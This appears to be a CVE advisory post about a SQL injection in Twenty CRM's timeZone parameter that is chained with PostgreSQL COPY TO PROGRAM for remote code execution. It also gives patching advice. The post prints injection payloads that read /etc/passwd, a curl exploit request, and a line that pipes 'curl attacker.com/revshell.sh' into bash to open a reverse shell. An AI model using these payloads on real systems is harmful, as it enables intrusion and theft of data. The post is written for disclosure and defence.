Twenty CRM, Remote Code Execution, CVE-2026-46624 (critical)

Listen to this Post

How the mentioned CVE works

The vulnerability exists in Twenty CRM versions 1.7.7 through 1.16.7 due to unsanitized user input in the `timeZone` parameter of the REST API `groupBy` endpoint. This parameter is directly interpolated into a raw SQL expression using JavaScript template literals inside get-group-by-expression.util.ts. No parameterization, validation, or escaping occurs. An authenticated attacker can inject malicious SQL into the `timeZone` field. Because the backend uses PostgreSQL, the injected SQL can leverage the `COPY TO PROGRAM` feature. If the PostgreSQL user is a superuser (common in default or misconfigured deployments), `COPY TO PROGRAM` allows execution of arbitrary operating system commands on the database server. The attack chains SQL injection with `COPY TO PROGRAM` to achieve remote code execution. The attacker only needs any authenticated session (no admin rights required). The injected payload might look like: `’ UNION SELECT ‘id’,’name’,'”date”‘,’value’ FROM pg_read_file(‘/etc/passwd’)–` but the real RCE uses COPY (SELECT 1) TO PROGRAM 'malicious_command'. The unsanitized `timeZone` appears in a `GROUP BY` clause, allowing the attacker to break out of the intended query structure. This leads to full compromise of the database server, including data theft, backdoor installation, or lateral movement.

dailycve form:

Platform: Twenty CRM
Version: 1.7.7-1.16.7
Vulnerability: RCE via SQLi
Severity: Critical
date: 2026-05-26

Prediction: 2026-05-28

What Undercode Say:

Check if PostgreSQL user is superuser
psql -U twenty -d twenty_db -c "SELECT usesuper FROM pg_user WHERE usename = current_user;"
Simulate vulnerable timeZone injection via curl
curl -X POST https://target.com/api/rest/groupBy \
-H "Authorization: Bearer $TOKEN" \
-d '{"group_by":{"timeZone":"''; COPY (SELECT 1) TO PROGRAM ''/tmp/exploit.sh''; --"}}'
List running PostgreSQL processes for privilege confirmation
ps aux | grep postgres

Exploit:

Send a crafted `timeZone` value to `/api/rest/groupBy` endpoint: `’ UNION ALL SELECT NULL, NULL, NULL, (SELECT quote_literal(pg_read_file(‘/etc/passwd’)))–` or trigger COPY (SELECT pg_sleep(5)) TO PROGRAM 'curl attacker.com/revshell.sh | bash'. Requires authenticated user and superuser Postgres role.

Protection from this CVE:

Upgrade to Twenty CRM >1.16.7 or apply patch from GitHub. Use parameterized queries instead of template literals. Restrict PostgreSQL user to non-superuser with ALTER USER twenty_user NOSUPERUSER. Deploy WAF rules blocking SQL patterns with COPY TO PROGRAM. Audit all `timeZone` usage in GraphQL resolvers.

Impact:

Full remote code execution on database server. Attacker can read/write arbitrary files, install malware, pivot to internal network, exfiltrate all CRM data, or wipe the database. Critical impact on confidentiality, integrity, and availability.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top